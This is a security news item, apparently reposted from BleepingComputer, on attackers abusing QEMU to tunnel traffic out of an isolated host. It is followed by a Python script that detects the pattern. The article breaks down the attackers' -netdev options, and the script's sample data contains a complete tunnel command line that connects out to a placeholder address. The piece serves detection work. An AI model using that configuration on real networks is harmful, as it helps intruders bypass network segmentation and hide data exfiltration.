
Hackers abuse QEMU to covertly tunnel network traffic in cyberattacks
2024-03-05 16:47

As part of the attack, threat actors used QEMU to create virtual network interfaces and a socket-type network device to connect to a remote server.

QEMU offers unique capabilities such as emulating a wide range of hardware and virtual networks, allowing malicious activities to blend in with benign virtualization traffic, and bridging segmented network parts through strategically set up VM pivot points.

In the attack seen by Kaspersky, the hackers utilized 'Angry IP Scanner' for network scanning, 'mimikatz' for credential theft, and QEMU for creating a sophisticated network tunneling setup that facilitated a covert communication channel.

-netdev user,id=lan,restrict=off: Configures a user-mode (SLIRP) network backend named 'lan'; restrict=off leaves guest traffic free to leave the VM through the host's network stack.

-netdev hubport,id=port-lan,hubid=0,netdev=lan (and a second hubport with netdev=sock): Each hubport attaches one backend to virtual hub 0, so the 'lan' backend and the socket backend exchange frames through the hub and traffic flows between the two.

Using QEMU, the attackers established a network tunnel from the targeted internal host, which had no internet access, to a pivot host with internet access, which in turn connected to the attacker's cloud server running a Kali Linux VM. The ability of QEMU VMs to link seamlessly and bridge segmented network components is key to bypassing security measures and may also be used to extend the breach laterally.
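The two option fragments above describe a recognisable shape on the command line: a host-side backend (user mode) and a socket backend plugged into the same hub, with the socket side dialling out to a remote address. The following added example, which is not code from the article or from QEMU, parses QEMU command lines (the samples are constructed, the -netdev syntax is QEMU's real syntax) and flags that shape, which is a practical starting point for a process-creation detection rule.

```python
"""Flag QEMU command lines that join a host-side network backend and a
remote socket backend on one virtual hub (the tunnel pattern described above).

Added example for this page, not code from the article or from QEMU. The
command lines below are constructed samples; the option syntax (-netdev
user/socket/hubport, id=, hubid=, netdev=, connect=) is QEMU's real syntax.
"""
import shlex
from collections import defaultdict

# Constructed samples: one ordinary VM and one hub-bridged launch.
SAMPLE_CMDLINES = [
    # Benign: user-mode networking attached to a guest NIC, no hub.
    "qemu-system-x86_64 -m 2048 -hda disk.qcow2 "
    "-netdev user,id=net0 -device e1000,netdev=net0",
    # Suspicious: 'lan' (user mode) and 'sock' (socket, dialling out to a
    # constructed address) joined through hub 0.
    "qemu-system-x86_64 "
    "-netdev user,id=lan,restrict=off "
    "-netdev socket,id=sock,connect=198.51.100.7:443 "
    "-netdev hubport,id=port-lan,hubid=0,netdev=lan "
    "-netdev hubport,id=port-sock,hubid=0,netdev=sock",
]


def parse_netdevs(cmdline):
    """Return {id: {"type": ..., option: value, ...}} for every -netdev argument."""
    argv = shlex.split(cmdline)
    netdevs = {}
    for i, tok in enumerate(argv[:-1]):
        if tok != "-netdev":
            continue
        parts = argv[i + 1].split(",")
        props = {"type": parts[0]}
        for kv in parts[1:]:
            key, _, value = kv.partition("=")
            props[key] = value
        if "id" in props:
            netdevs[props["id"]] = props
    return netdevs


def hub_bridges(netdevs):
    """Group backends by hub id and keep the hubs that join a socket backend
    with a non-socket backend (user/tap/bridge): the host<->remote bridge."""
    hubs = defaultdict(set)
    for props in netdevs.values():
        if props["type"] == "hubport" and props.get("netdev") in netdevs:
            hubs[props.get("hubid")].add(netdevs[props["netdev"]]["type"])
    return {hub: types for hub, types in hubs.items()
            if "socket" in types and types - {"socket"}}


def is_tunnel_like(cmdline):
    """True when the command line shows the bridging pattern and at least one
    socket backend dials out (connect=) rather than only listening."""
    netdevs = parse_netdevs(cmdline)
    dials_out = any(p["type"] == "socket" and "connect" in p
                    for p in netdevs.values())
    return dials_out and bool(hub_bridges(netdevs))


if __name__ == "__main__":
    for line in SAMPLE_CMDLINES:
        verdict = "TUNNEL-LIKE" if is_tunnel_like(line) else "ok"
        print(f"{verdict:12} {line[:70]}")
```

The check keys on topology rather than on a fixed string, so renaming the backend ids or changing the port does not evade it; legitimate uses of hubport with a socket backend (for example linking two local VMs) do exist, so treat a hit as a lead for review, ideally correlated with a QEMU binary appearing on a host where virtualization is not expected.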


News URL

https://www.bleepingcomputer.com/news/security/hackers-abuse-qemu-to-covertly-tunnel-network-traffic-in-cyberattacks/

Related vendor

VENDOR LAST 12M #/PRODUCTS LOW MEDIUM HIGH CRITICAL TOTAL VULNS
Qemu 1 84 192 69 13 358